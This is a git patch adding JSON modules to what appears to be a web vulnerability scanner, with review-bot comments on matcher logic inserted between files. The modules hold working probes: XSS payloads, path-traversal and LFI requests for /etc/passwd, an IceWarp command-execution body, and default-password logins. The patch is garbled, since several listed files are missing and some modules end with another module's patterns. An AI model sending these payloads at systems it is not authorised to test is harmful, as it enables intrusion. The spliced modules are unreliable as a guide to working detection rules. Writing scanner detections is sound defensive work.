From 344e1f73c4705991a3a467683ae005b8b04f07c0 Mon Sep 17 00:00:00 2001 
From: Kristian Bremberg Date: Tue, 20 Jul 2021 13:48:07 +0200 Subject: [PATCH] Add modules submitted through Crowdsource --- modules/crowdsourced/CVE-2017-9140.json | 24 ++++++++ modules/crowdsourced/CVE-2019-3402.json | 26 ++++++++ modules/crowdsourced/CVE-2021-28169.json | 21 +++++++ modules/crowdsourced/CVE-2021-32820.json | 24 ++++++++ .../activeadmin-panel-disclosure.json | 23 +++++++ .../crowdsourced/aem-invalidate-cache.json | 24 ++++++++ .../apache-airflow-debug-trace.json | 24 ++++++++ .../apache-superset-default-credentials.json | 23 +++++++ .../crowdsourced/appsec-yml-disclosure.json | 53 ++++++++++++++++ .../clockwork-dashboard-exposure.json | 38 ++++++++++++ .../dockerfile-hidden-disclosure.json | 23 +++++++ .../esmtprc-dotfile-disclosure.json | 27 +++++++++ .../crowdsourced/filezilla-disclosure.json | 25 ++++++++ .../git-credentials-disclosure.json | 29 +++++++++ .../github-workflows-disclosure.json | 60 +++++++++++++++++++ .../crowdsourced/gitlab-snippets-exposed.json | 21 +++++++ .../hp-ilo-serial-key-disclosure.json | 31 ++++++++++ modules/crowdsourced/icewarp-mail-rce.json | 27 +++++++++ .../ilo-serial-key-disclosure.json | 37 ++++++++++++ .../kubernetes-kustomization-disclosure.json | 44 ++++++++++++++ .../laravel-telescope-exposure.json | 23 +++++++ .../nginx-merge-slashes-path-traversal.json | 22 +++++++ modules/crowdsourced/oracle-ebs-lfi.json | 25 ++++++++ .../crowdsourced/php-user-ini-disclosure.json | 43 +++++++++++++ .../phpmyadmin-info-schema-disclosure.json | 30 ++++++++++ .../putty-private-key-disclosure.json | 24 ++++++++ .../crowdsourced/pyproject-disclosure.json | 24 ++++++++ .../roundcube-log-disclosure.json | 23 +++++++ ...ruby-on-rails-secret-token-disclosure.json | 24 ++++++++ .../showdoc-default-password.json | 22 +++++++ .../snyk-ignore-file-disclosure.json | 22 +++++++ .../spring-boot-loggers-disclosure.json | 31 ++++++++++ .../ssh-authorized-keys-disclosure.json | 20 +++++++ .../symfony-fragment-exposure.json | 25 ++++++++ 
.../crowdsourced/thumbs-db-disclosure.json | 16 +++++ 35 files changed, 978 insertions(+) create mode 100644 modules/crowdsourced/CVE-2017-9140.json create mode 100644 modules/crowdsourced/CVE-2019-3402.json create mode 100644 modules/crowdsourced/CVE-2021-28169.json create mode 100644 modules/crowdsourced/CVE-2021-32820.json create mode 100644 modules/crowdsourced/activeadmin-panel-disclosure.json create mode 100644 modules/crowdsourced/aem-invalidate-cache.json create mode 100644 modules/crowdsourced/apache-airflow-debug-trace.json create mode 100644 modules/crowdsourced/apache-superset-default-credentials.json create mode 100644 modules/crowdsourced/appsec-yml-disclosure.json create mode 100644 modules/crowdsourced/clockwork-dashboard-exposure.json create mode 100644 modules/crowdsourced/dockerfile-hidden-disclosure.json create mode 100644 modules/crowdsourced/esmtprc-dotfile-disclosure.json create mode 100644 modules/crowdsourced/filezilla-disclosure.json create mode 100644 modules/crowdsourced/git-credentials-disclosure.json create mode 100644 modules/crowdsourced/github-workflows-disclosure.json create mode 100644 modules/crowdsourced/gitlab-snippets-exposed.json create mode 100644 modules/crowdsourced/hp-ilo-serial-key-disclosure.json create mode 100644 modules/crowdsourced/icewarp-mail-rce.json create mode 100644 modules/crowdsourced/ilo-serial-key-disclosure.json create mode 100644 modules/crowdsourced/kubernetes-kustomization-disclosure.json create mode 100644 modules/crowdsourced/laravel-telescope-exposure.json create mode 100644 modules/crowdsourced/nginx-merge-slashes-path-traversal.json create mode 100644 modules/crowdsourced/oracle-ebs-lfi.json create mode 100644 modules/crowdsourced/php-user-ini-disclosure.json create mode 100644 modules/crowdsourced/phpmyadmin-info-schema-disclosure.json create mode 100644 modules/crowdsourced/putty-private-key-disclosure.json create mode 100644 modules/crowdsourced/pyproject-disclosure.json create mode 100644 
modules/crowdsourced/roundcube-log-disclosure.json create mode 100644 modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json create mode 100644 modules/crowdsourced/showdoc-default-password.json create mode 100644 modules/crowdsourced/snyk-ignore-file-disclosure.json create mode 100644 modules/crowdsourced/spring-boot-loggers-disclosure.json create mode 100644 modules/crowdsourced/ssh-authorized-keys-disclosure.json create mode 100644 modules/crowdsourced/symfony-fragment-exposure.json create mode 100644 modules/crowdsourced/thumbs-db-disclosure.json diff --git a/modules/crowdsourced/CVE-2017-9140.json b/modules/crowdsourced/CVE-2017-9140.json new file mode 100644 index 0000000..765ce0d --- /dev/null +++ b/modules/crowdsourced/CVE-2017-9140.json @@ -0,0 +1,24 @@ +{ + "request": { + "paths": [ + "/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000\"onload=\"prompt(1)" + ] + }, + "response": { + "matchesRequired": 3, + "matches": [ + { + "type": "status", + "code": 200 + }, + { + "type": "static", + "pattern": "var ParametersPage = new ParametersPage" + }, + { + "type": "static", + "pattern": "#000000\"onload=\"prompt(1);" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/CVE-2019-3402.json b/modules/crowdsourced/CVE-2019-3402.json new file mode 100644 index 0000000..0518715 --- /dev/null +++ b/modules/crowdsourced/CVE-2019-3402.json @@ -0,0 +1,26 @@ +{ + "request": { + "paths": [ + "/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" + ] + }, + "response": { + "matchesRequired": 3, + "matches": [ + { + "type": "header", + "name": "Content-Type", + "pattern": "(?i)text/html" + }, + { + "type": "status", + "code": 200, + "required": true + }, + { + "type": "static", + "pattern": "" + } + ] + } +} \ No newline at end of file 
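Review bot: CVE-2017-9140.json reports a reflected-XSS finding from the status code and two body strings alone, without checking that the response is served as HTML, so a reflection in a non-HTML response would still be flagged. CVE-2019-3402.json in this same commit does carry that check. Adding `{ "type": "header", "name": "Content-Type", "pattern": "(?i)text/html" }` to `matches` and raising `matchesRequired` to 4 would bring the two modules in line.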
diff --git a/modules/crowdsourced/CVE-2021-28169.json b/modules/crowdsourced/CVE-2021-28169.json new file mode 100644 index 0000000..102e360 --- /dev/null +++ b/modules/crowdsourced/CVE-2021-28169.json @@ -0,0 +1,21 @@ +{ + "request": { + "paths": [ + "/concat?/%2557EB-INF/web.xml" + ] + }, + "response": { + "matchesRequired": 2, + "matches": [ + { + "type": "header", + "name": "Content-Type", + "pattern": "(?i)(text/xml|application/xml)" + }, + { + "type": "static", + "pattern": "Powered by Active Admin" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/aem-invalidate-cache.json b/modules/crowdsourced/aem-invalidate-cache.json new file mode 100644 index 0000000..f73f201 --- /dev/null +++ b/modules/crowdsourced/aem-invalidate-cache.json @@ -0,0 +1,24 @@ +{ + "request": { + "paths": [ + "/dispatcher/invalidate.cache" + ], + "headers": [ + "CQ-Handle: /content", + "CQ-Path: /content" + ] + }, + "response": { + "matchesRequired": 2, + "matches": [ + { + "type": "status", + "code": 200 + }, + { + "type": "regex", + "pattern": "^

OK

$" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/apache-airflow-debug-trace.json b/modules/crowdsourced/apache-airflow-debug-trace.json new file mode 100644 index 0000000..376e7a5 --- /dev/null +++ b/modules/crowdsourced/apache-airflow-debug-trace.json @@ -0,0 +1,24 @@ +{ + "request": { + "paths": [ + "/admin/airflow/login" + ] + }, + "response": { + "matchesRequired": 3, + "matches": [ + { + "type": "status", + "code": 500 + }, + { + "type": "static", + "pattern": "

Ooops.

" + }, + { + "type": "static", + "pattern": "Traceback (most recent call last)" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/apache-superset-default-credentials.json b/modules/crowdsourced/apache-superset-default-credentials.json new file mode 100644 index 0000000..a070c35 --- /dev/null +++ b/modules/crowdsourced/apache-superset-default-credentials.json @@ -0,0 +1,23 @@ +{ + "request": { + "method": "POST", + "path": "/login/", + "body": "username=admin&password=admin", + "headers": [ + "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" + ] + }, + "response": { + "matchesRequired": 2, + "matches": [ + { + "type": "static", + "pattern": "Redirecting..." + }, + { + "type": "static", + "pattern": "
/" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/appsec-yml-disclosure.json b/modules/crowdsourced/appsec-yml-disclosure.json new file mode 100644 index 0000000..85618e9 --- /dev/null +++ b/modules/crowdsourced/appsec-yml-disclosure.json @@ -0,0 +1,53 @@ +{ + "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt", + "request": { + "paths": [ + "/appspec.yml", + "/appspec.yaml" + ] + }, + "response": { + "matchesRequired": 5, + "matches": [ + { + "type": "status", + "code": 200, + "required": true + }, + { + "type": "header", + "name": "Content-Type", + "pattern": "(?i)application/yaml", + "required": true + }, + { + "type": "static", + "pattern": "\"version\"" + }, + { + "type": "static", + "pattern": "\"os\"" + }, + { + "type": "static", + "pattern": "\"files\"" + }, + { + "type": "static", + "pattern": "\"permissions\"" + }, + { + "type": "static", + "pattern": "\"hooks\"" + }, + { + "type": "static", + "pattern": "\"BeforeInstall\"" + }, + { + "type": "static", + "pattern": "\"ApplicationStart\"" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/clockwork-dashboard-exposure.json b/modules/crowdsourced/clockwork-dashboard-exposure.json new file mode 100644 index 0000000..8d4edde --- /dev/null +++ b/modules/crowdsourced/clockwork-dashboard-exposure.json @@ -0,0 +1,38 @@ +{ + "request": { + "paths": [ + "/__clockwork/latest" + ] + }, + "response": { + "matchesRequired": 6, + "matches": [ + { + "type": "header", + "name": "Content-Type", + "pattern": "(?i)application/json", + "required": true + }, + { + "type": "static", + "pattern": "\"id\"" + }, + { + "type": "static", + "pattern": "\"version\"" + }, + { + "type": "static", + "pattern": "\"method\"" + }, + { + "type": "static", + "pattern": "\"url\"" + }, + { + "type": "static", + "pattern": "\"time\"" + } + ] + } +} \ No newline at end of file 
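Review bot: The static matchers in appsec-yml-disclosure.json look for keys wrapped in double quotes (`\"version\"`, `\"os\"`, `\"hooks\"` and so on), but the module requests `/appspec.yml` and `/appspec.yaml`, where keys are normally written unquoted. With `matchesRequired: 5` and only two non-content matchers, the module would seldom fire on a real file. A line-anchored regex on the bare key, for example `(?m)^\\s*hooks\\s*:`, fits the format better. The file is also named `appsec` while its paths say `appspec`; renaming it would keep the module findable.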
diff --git a/modules/crowdsourced/dockerfile-hidden-disclosure.json b/modules/crowdsourced/dockerfile-hidden-disclosure.json new file mode 100644 index 0000000..6a45e5e --- /dev/null +++ b/modules/crowdsourced/dockerfile-hidden-disclosure.json @@ -0,0 +1,23 @@ +{ + "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt", + "request": { + "paths": [ + "/.dockerfile", + "/.Dockerfile" + ] + }, + "response": { + "matchesRequired": 2, + "matches": [ + { + "type": "status", + "code": 200, + "required": true + }, + { + "type": "regex", + "pattern": "^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\\#)\\s+[ -~]+" + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/esmtprc-dotfile-disclosure.json b/modules/crowdsourced/esmtprc-dotfile-disclosure.json new file mode 100644 index 0000000..cf55841 --- /dev/null +++ b/modules/crowdsourced/esmtprc-dotfile-disclosure.json @@ -0,0 +1,27 @@ +{ + "name": "esmtprc dotfile", + "request": { + "path": "/.esmtprc" + }, + "response": { + "matchesRequired": 4, + "matches": [ + { + "type": "static", + "pattern": "hostname" + }, + { + "type": "static", + "pattern": "username" + }, + { + "type": "static", + "pattern": "password" + }, + { + "type": "status", + "code": 200 + } + ] + } +} \ No newline at end of file diff --git a/modules/crowdsourced/filezilla-disclosure.json b/modules/crowdsourced/filezilla-disclosure.json new file mode 100644 index 0000000..7d5ba30 --- /dev/null +++ b/modules/crowdsourced/filezilla-disclosure.json @@ -0,0 +1,25 @@ +{ + "request": { + "paths": [ + "/FileZilla.xml" + ] + }, + "response": { + "matchesRequired": 3, + "matches": [ + { + "type": "header", + "name": "Content-Type", + "pattern": "(?i)(text/xml|application/xml)" + }, + { + "type": "static", + "pattern": "" + }, + { + "type": "static", + "pattern": "Snippets · Explore · GitLab" + } + ] + } +} \ No newline at end of file 
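Review bot: esmtprc-dotfile-disclosure.json identifies the file only by the words `hostname`, `username` and `password` plus a 200 status, which a catch-all page containing a login or settings form would also satisfy. Other modules in this commit use a `mustNotMatch` list; adding `"mustNotMatch": [ { "type": "regex", "pattern": "(?i)<(html|body|form)" } ]` here would exclude HTML pages. Marking the status matcher `"required": true` would also match the convention used by the dotfile modules next to it.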
diff --git a/modules/crowdsourced/hp-ilo-serial-key-disclosure.json b/modules/crowdsourced/hp-ilo-serial-key-disclosure.json
new file mode 100644
index 0000000..9947f99
--- /dev/null
+++ b/modules/crowdsourced/hp-ilo-serial-key-disclosure.json
@@ -0,0 +1,31 @@
+{
+ "reference": "https://github.com/nmap/nmap/issues/1016",
+ "request": {
+ "paths": [
+ "/xmldata?item=CpqKey"
+ ]
+ },
+ "response": {
+ "matchesRequired": 4,
+ "matches": [
+ {
+ "type": "header",
+ "name": "Content-Type",
+ "pattern": "(?i)text/html",
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "LTYPE"
+ },
+ {
+ "type": "static",
+ "pattern": "LNAME"
+ },
+ {
+ "type": "static",
+ "pattern": "KEY"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/icewarp-mail-rce.json b/modules/crowdsourced/icewarp-mail-rce.json
new file mode 100644
index 0000000..c972cbf
--- /dev/null
+++ b/modules/crowdsourced/icewarp-mail-rce.json
@@ -0,0 +1,27 @@
+{
+ "request": {
+ "method": "POST",
+ "path": "/webmail/basic/",
+ "body": "_dlg[captcha][target]=system(\\'ver\\')\\",
+ "headers": [
+ "Content-Type: application/x-www-form-urlencoded"
+ ]
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "static",
+ "pattern": "Microsoft Windows ["
+ },
+ {
+ "type": "status",
+ "code": 302
+ },
+ {
+ "type": "status",
+ "code": 200
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/ilo-serial-key-disclosure.json b/modules/crowdsourced/ilo-serial-key-disclosure.json
new file mode 100644
index 0000000..e82ea81
--- /dev/null
+++ b/modules/crowdsourced/ilo-serial-key-disclosure.json
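Review bot: hp-ilo-serial-key-disclosure.json and ilo-serial-key-disclosure.json (the next file in this commit) probe the same path `/xmldata?item=CpqKey` for the same three strings, yet disagree on the response type: this one requires `Content-Type` `(?i)text/html`, the other expects `^text/xml`. Keeping a single module with the header matcher written as `(?i)^text/(html|xml)` would avoid duplicate findings and the contradictory expectation. The other file also omits `matchesRequired`, so its unrequired header and status matchers may have no effect, depending on the engine's default. The bare string `KEY` is short enough to appear in unrelated content, so a longer marker would be safer if the response offers one.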
@@ -0,0 +1,37 @@
+{
+ "request": {
+ "method": "GET",
+ "path": "/xmldata?item=CpqKey",
+ "headers": [
+ "Accept: text/xml"
+ ]
+ },
+ "response": {
+ "matches": [
+ {
+ "type": "static",
+ "pattern": "LTYPE",
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "LNAME",
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "KEY",
+ "required": true
+ },
+ {
+ "type": "header",
+ "name": "Content-Type",
+ "pattern": "^text/xml"
+ },
+ {
+ "type": "status",
+ "code": 200
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/kubernetes-kustomization-disclosure.json b/modules/crowdsourced/kubernetes-kustomization-disclosure.json
new file mode 100644
index 0000000..08227b7
--- /dev/null
+++ b/modules/crowdsourced/kubernetes-kustomization-disclosure.json
@@ -0,0 +1,44 @@
+{
+ "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt",
+ "request": {
+ "paths": [
+ "/kustomization.yml"
+ ]
+ },
+ "response": {
+ "matchesRequired": 4,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200,
+ "required": true
+ },
+ {
+ "type": "header",
+ "name": "Content-Type",
+ "pattern": "(?i)application/yaml",
+ "required": true
+ },
+ {
+ "type": "regex",
+ "pattern": "(?m)^\\s*apiVersion\\s*:\\s*kustomize\\.config"
+ },
+ {
+ "type": "regex",
+ "pattern": "(?mi)^\\s*kind\\s*:\\s*Kustomization"
+ },
+ {
+ "type": "regex",
+ "pattern": "(?m)^\\scommonLabels\\s*:"
+ },
+ {
+ "type": "regex",
+ "pattern": "(?m)^\\sresources\\s*:"
+ },
+ {
+ "type": "regex",
+ "pattern": "(?m)^\\snamespace\\s*:"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/laravel-telescope-exposure.json b/modules/crowdsourced/laravel-telescope-exposure.json
new file mode 100644
index 0000000..0e0accf
--- /dev/null
+++ b/modules/crowdsourced/laravel-telescope-exposure.json
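Review bot: The last three regex matchers in kubernetes-kustomization-disclosure.json are written `^\\scommonLabels`, `^\\sresources` and `^\\snamespace`, which demand a whitespace character in front of the key, while the first two matchers use `\\s*`. Top-level keys in a kustomization file normally start at column 0, so these three would seldom match and the module in practice depends on `apiVersion` and `kind` alone. `(?m)^\\s*commonLabels\\s*:` (and likewise for the other two) looks like what was intended. The module also probes only `/kustomization.yml`, whereas appsec-yml-disclosure.json in this commit tries both `.yml` and `.yaml`.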
@@ -0,0 +1,23 @@
+{
+ "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt",
+ "request": {
+ "paths": [
+ "/telescope"
+ ]
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "header",
+ "name": "Content-Type",
+ "pattern": "(?i)text/html",
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "Laravel Telescope"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/nginx-merge-slashes-path-traversal.json b/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
new file mode 100644
index 0000000..42724c9
--- /dev/null
+++ b/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
@@ -0,0 +1,22 @@
+{
+ "request": {
+ "paths": [
+ "//////../../../etc/passwd",
+ "static//////../../../../etc/passwd",
+ "///../app.js"
+ ]
+ },
+ "response": {
+ "matchesRequired": 1,
+ "matches": [
+ {
+ "type": "static",
+ "pattern": "root:"
+ },
+ {
+ "type": "static",
+ "pattern": "app.listen"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/oracle-ebs-lfi.json b/modules/crowdsourced/oracle-ebs-lfi.json
new file mode 100644
index 0000000..f8d3b5d
--- /dev/null
+++ b/modules/crowdsourced/oracle-ebs-lfi.json
@@ -0,0 +1,25 @@
+{
+ "request": {
+ "method": "GET",
+ "path": "/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "regex",
+ "pattern": "root:"
+ },
+ {
+ "type": "status",
+ "code": 200
+ }
+ ],
+ "mustNotMatch": [
+ {
+ "type": "regex",
+ "pattern": "(server error|not found)"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/php-user-ini-disclosure.json b/modules/crowdsourced/php-user-ini-disclosure.json
new file mode 100644
index 0000000..edd16c8
--- /dev/null
+++ b/modules/crowdsourced/php-user-ini-disclosure.json
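Review bot: In nginx-merge-slashes-path-traversal.json a single static hit on `root:` or `app.listen` is enough to report a finding (`matchesRequired: 1`, no status matcher), so any page that happens to contain either string is flagged as path traversal. A regex matcher tied to the passwd line format, `"pattern": "root:.*:0:0:"`, together with a `200` status matcher would cut false positives. oracle-ebs-lfi.json, later in this commit, uses the same bare `root:` pattern and would benefit from the same change. The second path, `static//////../../../../etc/passwd`, also lacks the leading `/` that the other two paths have.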
@@ -0,0 +1,43 @@
+{
+ "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt",
+ "request": {
+ "paths": [
+ "/user.ini",
+ "/.user.ini"
+ ]
+ },
+ "response": {
+ "matchesRequired": 5,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200,
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "assert"
+ },
+ {
+ "type": "static",
+ "pattern": "highlight"
+ },
+ {
+ "type": "static",
+ "pattern": "opcache"
+ },
+ {
+ "type": "static",
+ "pattern": "mssql"
+ },
+ {
+ "type": "static",
+ "pattern": "oci8"
+ },
+ {
+ "type": "static",
+ "pattern": "agent"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/phpmyadmin-info-schema-disclosure.json b/modules/crowdsourced/phpmyadmin-info-schema-disclosure.json
new file mode 100644
index 0000000..cb201b7
--- /dev/null
+++ b/modules/crowdsourced/phpmyadmin-info-schema-disclosure.json
@@ -0,0 +1,30 @@
+{
+ "request": {
+ "paths": [
+ "/index.php?db=information_schema"
+ ]
+ },
+ "response": {
+ "matchesRequired": 3,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200
+ },
+ {
+ "type": "static",
+ "pattern": "var common_query ="
+ },
+ {
+ "type": "static",
+ "pattern": "var pma_absolute_uri ="
+ }
+ ],
+ "mustNotMatch": [
+ {
+ "type": "regex",
+ "pattern": ""
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/putty-private-key-disclosure.json b/modules/crowdsourced/putty-private-key-disclosure.json
new file mode 100644
index 0000000..dc7a6d7
--- /dev/null
+++ b/modules/crowdsourced/putty-private-key-disclosure.json
@@ -0,0 +1,24 @@
+{
+ "request": {
+ "paths": [
+ "/my.ppk"
+ ]
+ },
+ "response": {
+ "matchesRequired": 3,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200
+ },
+ {
+ "type": "static",
+ "pattern": "PuTTY-User-Key-File"
+ },
+ {
+ "type": "static",
+ "pattern": "Encryption:"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/pyproject-disclosure.json b/modules/crowdsourced/pyproject-disclosure.json
new file mode 100644
index 0000000..549190b
--- /dev/null
+++ b/modules/crowdsourced/pyproject-disclosure.json
@@ -0,0 +1,24 @@
+{
+ "request": {
+ "paths": [
+ "/pyproject.toml"
+ ]
+ },
+ "response": {
+ "matchesRequired": 3,
+ "matches": [
+ {
+ "type": "static",
+ "pattern": "[build-system]"
+ },
+ {
+ "type": "static",
+ "pattern": "[tool.poetry]"
+ },
+ {
+ "type": "status",
+ "code": 200
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/roundcube-log-disclosure.json b/modules/crowdsourced/roundcube-log-disclosure.json
new file mode 100644
index 0000000..6b7823e
--- /dev/null
+++ b/modules/crowdsourced/roundcube-log-disclosure.json
@@ -0,0 +1,23 @@
+{
+ "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt",
+ "request": {
+ "paths": [
+ "roundcube/logs/sendmail",
+ "roundcube/logs/errors.log"
+ ]
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200,
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "IMAP Error:"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json b/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json
new file mode 100644
index 0000000..13483c5
--- /dev/null
+++ b/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json
@@ -0,0 +1,24 @@
+{
+ "request": {
+ "paths": [
+ "/config/initializers/secret_token.rb"
+ ]
+ },
+ "response": {
+ "matchesRequired": 3,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200
+ },
+ {
+ "type": "static",
+ "pattern": "secret_key_base ="
+ },
+ {
+ "type": "static",
+ "pattern": "config.secret_token ="
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/showdoc-default-password.json b/modules/crowdsourced/showdoc-default-password.json
new file mode 100644
index 0000000..e202142
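Review bot: Both paths in roundcube-log-disclosure.json (`roundcube/logs/sendmail`, `roundcube/logs/errors.log`) lack the leading `/` that almost every other module's paths in this commit start with; unless the engine normalises paths, the request target would be malformed or resolved differently than intended. Writing them as `/roundcube/logs/sendmail` and `/roundcube/logs/errors.log` removes the doubt. The only content matcher, `IMAP Error:`, presumably appears in the error log but not in the sendmail log, so the first path may never produce a finding; that is worth confirming against a sample of each log.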
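Review bot: ruby-on-rails-secret-token-disclosure.json sets `matchesRequired: 3` over three matchers, so a response must contain both `secret_key_base =` and `config.secret_token =` to be reported. As far as I know, a secret_token.rb initializer normally assigns only one of the two, depending on the Rails version, so an exposed file would usually be missed. Setting `matchesRequired` to 2 and adding `"required": true` to the status matcher would accept either assignment while still insisting on the 200.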
--- /dev/null
+++ b/modules/crowdsourced/showdoc-default-password.json
@@ -0,0 +1,22 @@
+{
+ "name": "ShowDoc Default Password",
+ "request": {
+ "method": "POST",
+ "path": "/server/index.php?s=/api/user/login",
+ "body": "username=showdoc&password=123456"
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "static",
+ "pattern": "groupid",
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "user_token"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/snyk-ignore-file-disclosure.json b/modules/crowdsourced/snyk-ignore-file-disclosure.json
new file mode 100644
index 0000000..417a96c
--- /dev/null
+++ b/modules/crowdsourced/snyk-ignore-file-disclosure.json
@@ -0,0 +1,22 @@
+{
+ "submitter": "Sebastian Neef (@gehaxelt), https://cs.detectify.com/profile/gehaxelt",
+ "request": {
+ "paths": [
+ "/.snyk"
+ ]
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "status",
+ "code": 200,
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities."
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/spring-boot-loggers-disclosure.json b/modules/crowdsourced/spring-boot-loggers-disclosure.json
new file mode 100644
index 0000000..658874d
--- /dev/null
+++ b/modules/crowdsourced/spring-boot-loggers-disclosure.json
@@ -0,0 +1,31 @@
+{
+ "request": {
+ "paths": [
+ "/actuator/loggers",
+ "/loggers"
+ ]
+ },
+ "response": {
+ "matchesRequired": 4,
+ "matches": [
+ {
+ "type": "header",
+ "name": "Content-Type",
+ "pattern": "(?i)(spring-boot.actuator|application/json)"
+ },
+ {
+ "type": "status",
+ "code": 200,
+ "required": true
+ },
+ {
+ "type": "static",
+ "pattern": "\"loggers\""
+ },
+ {
+ "type": "static",
+ "pattern": "\"profiles\":"
+ }
+ ]
+ }
+}
\ No newline at end of file
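Review bot: spring-boot-loggers-disclosure.json needs all four matchers (`matchesRequired: 4`), including the static `\"profiles\":`. As far as I know the loggers endpoint answers with `levels` and `loggers` and carries no `profiles` key, which belongs to the env endpoint, so this module may never fire; that is worth confirming against a real response. If confirmed, replace that matcher's pattern with `"\"levels\""`, or drop the matcher and set `matchesRequired` to 3. In the header regex the dot in `spring-boot.actuator` is unescaped; `spring-boot\\.actuator` states the intent.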
diff --git a/modules/crowdsourced/ssh-authorized-keys-disclosure.json b/modules/crowdsourced/ssh-authorized-keys-disclosure.json
new file mode 100644
index 0000000..e419379
--- /dev/null
+++ b/modules/crowdsourced/ssh-authorized-keys-disclosure.json
@@ -0,0 +1,20 @@
+{
+ "request": {
+ "paths": [
+ "/.ssh/authorized_keys"
+ ]
+ },
+ "response": {
+ "matchesRequired": 2,
+ "matches": [
+ {
+ "type": "static",
+ "pattern": "-----BEGIN RSA PRIVATE KEY-----"
+ },
+ {
+ "type": "static",
+ "pattern": "-----END RSA PRIVATE KEY-----"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/symfony-fragment-exposure.json b/modules/crowdsourced/symfony-fragment-exposure.json
new file mode 100644
index 0000000..c394b62
--- /dev/null
+++ b/modules/crowdsourced/symfony-fragment-exposure.json
@@ -0,0 +1,25 @@
+{
+ "reference": "https://www.ambionics.io/blog/symfony-secret-fragment",
+ "request": {
+ "paths": [
+ "/_fragment"
+ ]
+ },
+ "response": {
+ "matchesRequired": 3,
+ "matches": [
+ {
+ "type": "status",
+ "code": 403
+ },
+ {
+ "type": "static",
+ "pattern": "AccessDeniedHttpException"
+ },
+ {
+ "type": "static",
+ "pattern": "FragmentListener"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/thumbs-db-disclosure.json b/modules/crowdsourced/thumbs-db-disclosure.json
new file mode 100644
index 0000000..5ca243e
--- /dev/null
+++ b/modules/crowdsourced/thumbs-db-disclosure.json
@@ -0,0 +1,16 @@
+{
+ "request": {
+ "paths": [
+ "/Thumbs.db"
+ ]
+ },
+ "response": {
+ "matchesRequired": 1,
+ "matches": [
+ {
+ "type": "regex",
+ "pattern": "\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1"
+ }
+ ]
+ }
+}
\ No newline at end of file
